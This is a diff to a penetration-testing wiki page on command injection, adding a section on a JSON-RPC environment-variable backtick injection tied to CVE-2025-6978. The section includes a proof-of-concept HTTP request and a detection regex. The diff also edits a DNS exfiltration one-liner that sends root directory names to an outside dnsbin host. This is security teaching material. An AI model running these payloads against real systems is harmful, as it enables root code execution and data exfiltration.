CVE-2025-6978 Arbitrary Code Execution in the Arista NG Fire...

src/pentesting-web/command-injection.md

@@ -104,7 +104,7 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi
 ```
 1. Go to http://dnsbin.zhack.ca/
 2. Execute a simple 'ls'
-for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
+for i in $(ls /) ; do host "${i}.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
 ```
 
 ```
@@ -158,6 +158,29 @@ execFile('/usr/bin/do-something', [
 
 Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).
 
+### JSON-RPC env vars → shell `eval` chain (blacklist bypass)
+
+Some web consoles expose JSON-RPC methods that **allow-list** the main action but forward **secondary parameters as environment variables** to a shell script. A typical vulnerable flow:
+
+- JSON body `params[0]` selects the action (e.g., `"DNS"`) and is checked against an enum.
+- `params[1]` is an object; each key/value is concatenated into `KEY=value` and passed as the `envp` argument to `Runtime.exec()` when launching a troubleshooting script.
+- A weak blacklist only rejects `; & | > $(`, so **command substitution via backticks** (`` ` ``) survives.
+- The script builds a `CMD` string with those environment variables and executes it with `eval`, so injected backticks are executed as root.
+
+Minimal PoC against such an endpoint (`/admin/JSON-RPC`, authenticated):
+
+```http
+POST /admin/JSON-RPC HTTP/1.1
+Content-Type: application/json
+
+{"method":"runTroubleshooting","params":["DNS",{"HOST":"127.0.0.1`id`"}],"id":1}
+```
+
+Network detection hints for this pattern:
+- Look for POSTs to `/admin/JSON-RPC` with `method` containing `runTroubleshooting`.
+- Inspect `params[1]` object keys like `HOST` or `URL` for command-substitution metacharacters after URL/JSON decoding (case-sensitive).
+- Example regex from vendor guidance: `/\x22(HOST|URL)\x22\s*:\s*\x22(?:[^\x22\\]|\\.)*?[\x60\x27\x24\x3c]/`.
+
 ### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
 
 Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
@@ -216,13 +239,13 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 
 ## References
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
+- [CVE-2025-6978 Arista NG Firewall JSON-RPC command injection](https://www.thezdi.com/blog/2026/2/4/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall)
 
 {{#include ../banners/hacktricks-training.md}}